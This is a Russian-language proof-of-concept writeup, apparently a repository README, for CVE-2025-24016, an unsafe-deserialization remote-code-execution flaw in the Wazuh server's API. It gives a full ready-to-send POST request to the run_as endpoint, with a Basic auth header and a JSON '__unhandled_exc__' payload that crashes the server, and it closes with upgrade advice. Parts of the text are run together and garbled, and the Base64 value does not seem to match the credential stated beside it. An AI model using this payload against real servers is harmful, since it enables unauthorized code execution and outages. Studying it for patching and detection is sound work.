
CVE-2025-24016: RCE в сервере Wazuh! Удалённое выполнение кода
В этом репозитории демонстрируется уязвимость удаленного выполнения кода (RCE) в сервере Wazuh, вызванная небезопасной десериализацией в пакете wazuh-manager. Уязвимость позволяет удаленным злоумышленникам, имеющим доступ к API (скомпрометированная панель управления, серверы Wazuh в кластере или определенные конфигурации со скомпрометированными агентами), выполнять произвольный код на сервере.
wazuh-manager версии >= 4.4.0>= 4.9.1Уязвимость находится в API Wazuh, где параметры в DistributedAPI сериализуются в JSON и десериализуются с помощью as_wazuh_object в файле . Злоумышленник может воспользоваться этой уязвимостью, внедряя несанитизированный словарь в DAPI-запросы, что может привести к выполнению произвольного Python-кода.
framework/wazuh/core/cluster/common.pyRCE можно вызвать через конечную точку run_as, которая позволяет злоумышленнику управлять аргументом auth_context. Создав вредоносный запрос, можно выполнить произвольный код на главном сервере.
Чтобы воспроизвести эту уязвимость через API сервера, выполните следующие шаги.
POST /security/user/authenticate/run_as HTTP/1.1
Host: target.com:55000
Cache-Control: max-age=0
Accept-Language: en-US
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.6478.183 Safari/537.36
Accept: application/json
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Authorization: Basic d2F6dXcta3dpTUltUzNjcjM3UDA1MHItOg== # Base64-encoded "wazuh-wui:MyS3cr37P450r.*-"
Content-Type: application/json
Content-Length: 83
{
"__unhandled_exc__": {
"__class__": "exit",
"__args__": []
}
}

wazuh-wui:MyS3cr37P450r.*-).__unhandled_exc__, которое запускает выполнение произвольного Python-кода (в данном случае — exit).>= 4.4.0 вплоть до 4.9.0 (еще не исправленные).exit, что приводит к остановке сервера Wazuh.Для защиты своих систем обновитесь до версии Wazuh >= 4.9.1, в которой эта проблема исправлена.